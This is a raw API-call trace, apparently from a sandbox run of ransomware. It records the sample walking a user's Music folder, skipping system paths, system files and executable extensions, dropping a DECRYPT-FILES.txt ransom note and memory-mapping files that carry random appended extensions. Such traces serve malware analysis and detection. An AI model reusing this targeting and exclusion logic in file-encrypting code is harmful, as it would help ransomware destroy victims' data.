lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0185.925] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="qD8wKNVWw-K1Oehbsb.m4a.XV2X" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\qD8wKNVWw-K1Oehbsb.m4a.XV2X") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\qD8wKNVWw-K1Oehbsb.m4a.XV2X" [0185.926] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\qD8wKNVWw-K1Oehbsb.m4a.XV2X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\qd8wknvww-k1oehbsb.m4a.xv2x"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.926] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=75289) returned 1 [0185.926] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.926] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.927] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.927] CloseHandle (hObject=0x270) returned 1 [0185.927] CloseHandle (hObject=0x26c) returned 1 [0185.927] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.927] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0d13dd0, ftCreationTime.dwHighDateTime=0x1d4c774, ftLastAccessTime.dwLowDateTime=0xaf605a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf605a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkSCcRt5MdQwSoZl", cAlternateFileName="SKSCCR~1")) returned 1 [0185.927] lstrcmpW (lpString1="SkSCcRt5MdQwSoZl", lpString2=".") returned 1 [0185.927] lstrcmpW (lpString1="SkSCcRt5MdQwSoZl", lpString2="..") returned 1 [0185.927] lstrcatW (in: lpString1="SkSCcRt5MdQwSoZl", lpString2="\\" | out: lpString1="SkSCcRt5MdQwSoZl\\") returned="SkSCcRt5MdQwSoZl\\" [0185.927] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="SkSCcRt5MdQwSoZl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" [0185.927] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\Program Files") returned 0x0 [0185.927] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch=":\\Windows") returned 0x0 [0185.927] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\Games\\") returned 0x0 [0185.927] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.927] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.927] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\All Users") returned 0x0 [0185.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="AhnLab") returned 0x0 [0185.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.928] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0185.928] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.928] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\\\0a16c9.tmp") returned 89 [0185.928] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0185.930] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0185.930] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.930] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\\\DECRYPT-FILES.txt") returned 96 [0185.930] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.931] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0185.931] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\*" [0185.931] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0d13dd0, ftCreationTime.dwHighDateTime=0x1d4c774, ftLastAccessTime.dwLowDateTime=0xf1887300, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1887300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0185.931] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.931] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0d13dd0, ftCreationTime.dwHighDateTime=0x1d4c774, ftLastAccessTime.dwLowDateTime=0xf1887300, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1887300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.931] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.931] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.931] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1887300, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1887300, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1887300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.931] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.931] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.931] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.931] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.931] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.931] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.932] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.932] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.932] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.932] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.932] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.932] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.932] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.932] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.932] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.932] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0185.932] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.932] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" [0185.932] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\0a16c9.tmp" [0185.932] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.932] CloseHandle (hObject=0x0) returned 0 [0185.932] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.932] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf593640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf593640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf593640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.933] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.933] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x591f2090, ftCreationTime.dwHighDateTime=0x1d4d463, ftLastAccessTime.dwLowDateTime=0x9b95c700, ftLastAccessTime.dwHighDateTime=0x1d4c9a8, ftLastWriteTime.dwLowDateTime=0xaf593640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x16e23, dwReserved0=0x0, dwReserved1=0x0, cFileName="fRU1utAoUZpSLIvF.mp3.7hO0", cAlternateFileName="FRU1UT~1.7HO")) returned 1 [0185.933] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3.7hO0", lpString2="DECRYPT-FILES.txt") returned 1 [0185.933] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3.7hO0", lpString2="autorun.inf") returned 1 [0185.933] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3.7hO0", lpString2="boot.ini") returned 1 [0185.933] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3.7hO0", lpString2="desktop.ini") returned 1 [0185.933] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3.7hO0", lpString2="ntuser.dat") returned -1 [0185.933] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3.7hO0", lpString2="iconcache.db") returned -1 [0185.933] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3.7hO0", lpString2="bootsect.bak") returned 1 [0185.933] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3.7hO0", lpString2="ntuser.dat.log") returned -1 [0185.933] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3.7hO0", lpString2="thumbs.db") returned -1 [0185.933] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3.7hO0", lpString2="Bootfont.bin") returned 1 [0185.933] lstrlenW (lpString="fRU1utAoUZpSLIvF.mp3.7hO0") returned 25 [0185.933] lstrcmpiW (lpString1="7hO0", lpString2="lnk") returned -1 [0185.933] lstrcmpiW (lpString1="7hO0", lpString2="exe") returned -1 [0185.933] lstrcmpiW (lpString1="7hO0", lpString2="sys") returned -1 [0185.933] lstrcmpiW (lpString1="7hO0", lpString2="dll") returned -1 [0185.933] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0185.933] lstrlenW (lpString="fRU1utAoUZpSLIvF.mp3.7hO0") returned 25 [0185.933] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" [0185.933] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpString2="fRU1utAoUZpSLIvF.mp3.7hO0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\fRU1utAoUZpSLIvF.mp3.7hO0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\fRU1utAoUZpSLIvF.mp3.7hO0" [0185.933] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\fRU1utAoUZpSLIvF.mp3.7hO0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\fru1utaouzpslivf.mp3.7ho0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0185.934] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=93731) returned 1 [0185.934] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0185.934] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.934] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.935] CloseHandle (hObject=0x278) returned 1 [0185.935] CloseHandle (hObject=0x274) returned 1 [0185.935] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.935] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc187b0, ftCreationTime.dwHighDateTime=0x1d4d28a, ftLastAccessTime.dwLowDateTime=0xf2627720, ftLastAccessTime.dwHighDateTime=0x1d4d57b, ftLastWriteTime.dwLowDateTime=0xaf5df900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x15b2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="_GY3M0t4Il.wav.0OcFr", cAlternateFileName="_GY3M0~1.0OC")) returned 1 [0185.935] lstrcmpiW (lpString1="_GY3M0t4Il.wav.0OcFr", lpString2="DECRYPT-FILES.txt") returned -1 [0185.935] lstrcmpiW (lpString1="_GY3M0t4Il.wav.0OcFr", lpString2="autorun.inf") returned -1 [0185.935] lstrcmpiW (lpString1="_GY3M0t4Il.wav.0OcFr", lpString2="boot.ini") returned -1 [0185.935] lstrcmpiW (lpString1="_GY3M0t4Il.wav.0OcFr", lpString2="desktop.ini") returned -1 [0185.935] lstrcmpiW (lpString1="_GY3M0t4Il.wav.0OcFr", lpString2="ntuser.dat") returned -1 [0185.935] lstrcmpiW (lpString1="_GY3M0t4Il.wav.0OcFr", lpString2="iconcache.db") returned -1 [0185.935] lstrcmpiW (lpString1="_GY3M0t4Il.wav.0OcFr", lpString2="bootsect.bak") returned -1 [0185.935] lstrcmpiW (lpString1="_GY3M0t4Il.wav.0OcFr", lpString2="ntuser.dat.log") returned -1 [0185.935] lstrcmpiW (lpString1="_GY3M0t4Il.wav.0OcFr", lpString2="thumbs.db") returned -1 [0185.935] lstrcmpiW (lpString1="_GY3M0t4Il.wav.0OcFr", lpString2="Bootfont.bin") returned -1 [0185.935] lstrlenW (lpString="_GY3M0t4Il.wav.0OcFr") returned 20 [0185.935] lstrcmpiW (lpString1="0OcFr", lpString2="lnk") returned -1 [0185.935] lstrcmpiW (lpString1="0OcFr", lpString2="exe") returned -1 [0185.935] lstrcmpiW (lpString1="0OcFr", lpString2="sys") returned -1 [0185.935] lstrcmpiW (lpString1="0OcFr", lpString2="dll") returned -1 [0185.935] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0185.935] lstrlenW (lpString="_GY3M0t4Il.wav.0OcFr") returned 20 [0185.935] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" [0185.935] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpString2="_GY3M0t4Il.wav.0OcFr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\_GY3M0t4Il.wav.0OcFr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\_GY3M0t4Il.wav.0OcFr" [0185.935] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.936] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\_GY3M0t4Il.wav.0OcFr" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\_gy3m0t4il.wav.0ocfr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0185.936] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=88876) returned 1 [0185.936] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0185.936] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.937] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.937] CloseHandle (hObject=0x278) returned 1 [0185.937] CloseHandle (hObject=0x274) returned 1 [0185.937] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.937] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc187b0, ftCreationTime.dwHighDateTime=0x1d4d28a, ftLastAccessTime.dwLowDateTime=0xf2627720, ftLastAccessTime.dwHighDateTime=0x1d4d57b, ftLastWriteTime.dwLowDateTime=0xaf5df900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x15b2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="_GY3M0t4Il.wav.0OcFr", cAlternateFileName="_GY3M0~1.0OC")) returned 0 [0185.937] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0185.937] CloseHandle (hObject=0x26c) returned 1 [0185.938] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc4ebb0, ftCreationTime.dwHighDateTime=0x1d4cf11, ftLastAccessTime.dwLowDateTime=0xaa07fbc0, ftLastAccessTime.dwHighDateTime=0x1d4d27a, ftLastWriteTime.dwLowDateTime=0xaf605a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6df3, dwReserved0=0x0, dwReserved1=0x0, cFileName="UJdL.mp3.sIe3v", cAlternateFileName="UJDLMP~1.SIE")) returned 1 [0185.938] lstrcmpiW (lpString1="UJdL.mp3.sIe3v", lpString2="DECRYPT-FILES.txt") returned 1 [0185.938] lstrcmpiW (lpString1="UJdL.mp3.sIe3v", lpString2="autorun.inf") returned 1 [0185.938] lstrcmpiW (lpString1="UJdL.mp3.sIe3v", lpString2="boot.ini") returned 1 [0185.938] lstrcmpiW (lpString1="UJdL.mp3.sIe3v", lpString2="desktop.ini") returned 1 [0185.938] lstrcmpiW (lpString1="UJdL.mp3.sIe3v", lpString2="ntuser.dat") returned 1 [0185.938] lstrcmpiW (lpString1="UJdL.mp3.sIe3v", lpString2="iconcache.db") returned 1 [0185.938] lstrcmpiW (lpString1="UJdL.mp3.sIe3v", lpString2="bootsect.bak") returned 1 [0185.938] lstrcmpiW (lpString1="UJdL.mp3.sIe3v", lpString2="ntuser.dat.log") returned 1 [0185.938] lstrcmpiW (lpString1="UJdL.mp3.sIe3v", lpString2="thumbs.db") returned 1 [0185.938] lstrcmpiW (lpString1="UJdL.mp3.sIe3v", lpString2="Bootfont.bin") returned 1 [0185.938] lstrlenW 